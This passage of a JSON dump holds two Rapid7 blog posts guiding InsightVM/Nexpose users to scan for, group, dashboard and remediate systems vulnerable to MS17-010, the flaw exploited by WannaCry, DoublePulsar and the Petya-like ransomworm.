8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here’s </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.  To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"background-color: #f6f6f6; color: #000000; font-family: 'courier new', courier; font-size: 12pt;\">asset.vulnerability.alternateIds <=> ( altId = \"MS17-010\" )<br/></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the “Projects” tab and click “Create a Project”:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for some of the vulnerabilities leveraged by this ransomworm. If you have any questions please don’t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:880a7067-953c-4d86-bb9f-22e02d26586e] -->", "cvss3": {}, "published": "2017-08-03T16:56:04", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "modified": "2017-08-03T16:56:04", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-24T01:16:32", "description": "<!-- [DocumentBodyStart:53f4c57c-eea0-4790-a908-f2f47ce880e1] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">After <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">WannaCry</a> </span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">hit systems around the world last month, security experts warned that the underlying vulnerabilities that allowed the ransomworm to spread are still unpatched in many environments, rendering those systems vulnerable to other hacking tools from the same toolset. Rapid7’s Project Heisenberg continues to see a high volume of scans and exploit attempts targeting SMB vulnerabilities:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7919-67213/Heisenberg-smb-3.png\"><img alt=\"Heisenberg-smb-3.png\" class=\"image-1 jive-image\" height=\"351\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7919-67213/1600-351/Heisenberg-smb-3.png\" style=\"width: 620px; height: 136px;\" width=\"1600\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">DoublePulsar, a backdoor that has infected hundreds of thousands of computers, is one of the most nefarious of these tools: It can not only distribute ransomware but is also able to infect a system’s kernel to gain privileges and steal credentials. Identifying and patching vulnerable systems remains the best way to defend against the DoublePulsar implant. DoublePulsar is often delivered using the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue exploit package</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">—MS17-010—which is the same vulnerability that gave rise to the widespread WannaCry infections in May. To help customers, we are reiterating the steps we issued for WannaCry on creating a scan, dynamic asset group, and remediation project for identifying and fixing these vulnerabilities. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, you can <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">download a trial of InsightVM here</a>. </span><span style=\"color: #1155cc; font-size: 11pt; font-family: Arial;\"><br/></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><strong>Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates > Manage Templates</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\"><img class=\"jive-image\" height=\"229\" src=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit without Web Spider. Don’t forget to give your copy a name and description; here, we’ll call it “Double Pulsar and WNCRY Scan Template”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\"><img class=\"jive-image\" height=\"247\" src=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\"><img class=\"jive-image\" height=\"275\" src=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then “By Individual Check”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\"><img class=\"jive-image\" height=\"265\" src=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check \"<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>\"</span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\"><img class=\"jive-image\" height=\"227\" src=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 195 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0148</span></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a Dynamic Asset Group for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> c</span><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\">onsole, just under the search button:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\"><img class=\"jive-image\" height=\"157\" src=\"https://lh6.googleusercontent.com/SOuRrmrhd5X9f64XMtrXQrZGCjf4qyxdeRRfg5aIK7ljeaqGO8wf15wrb5Nj5OaYu5UxW5BEIvrrI3u2ddSjaCYFrr6ly19-_eIkFpqDDFGMQfQm1iVmiV4i2V3S4nDmG9oJeG7u\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a DoublePulsar/WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry and DoublePulsar, you could use this Dashboard filter:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Calibri; color: #000000; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" ORasset.vulnerability.title CONTAINS \"cve-2017-0146\"asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #231f20;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning & Reporting. This will also apply to DoublePulsar</a>.</span></p><h2 dir=\"ltr\"></h2><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a Remediation Project for MS17-010</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the “Projects” tab and click “Create a Project”:</span></p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\"><img class=\"jive-image\" height=\"144\" src=\"https://lh4.googleusercontent.com/Y-Kj2JX8i-J35zHYwGyxcmHvFVgL7rPui19ePSs5Zl_QRe85OZU2c-gjrk0gcPFSL5xxTMRibzKI91eLRiuYpVqckmb3Qa3MzIH3CbIyNsflCA_wNuc1GZmtQBxJFikXEDeKhdAo\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds <=> ( altId = \"ms17-010\" )\"</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\"><img class=\"jive-image\" height=\"456\" src=\"https://lh5.googleusercontent.com/-0n1zNDDrpFqs58I7XcahTGgFdgo9B3mnA7g2MGqgp2PgNIAP4UoMv5jadxCevG2rrjPkhlj8-ON14Mp4pK0bIUOTwzltWKpH9IaCCLsOd7vyPQ9AymVbRoAMkAdVC_wpqkn5xNI\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now you can give this project a description and configure who is responsible for remediation, as well as access levels if you wish. If you have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.atlassian.com%2Fsoftware%2Fjira\" rel=\"nofollow\" target=\"_blank\">JIRA</a>, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you’ll be able to quickly scan for the vulnerability that enables both WannaCry and DoublePulsar infections. If you have any questions please don’t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on DoublePulsar, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\">please visit this page</a>. </span></p></div><!-- [DocumentBodyEnd:53f4c57c-eea0-4790-a908-f2f47ce880e1] -->", "cvss3": {}, "published": "2017-06-23T21:23:11", "title": "Protecting against DoublePulsar infection with InsightVM and Nexpose", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0101", 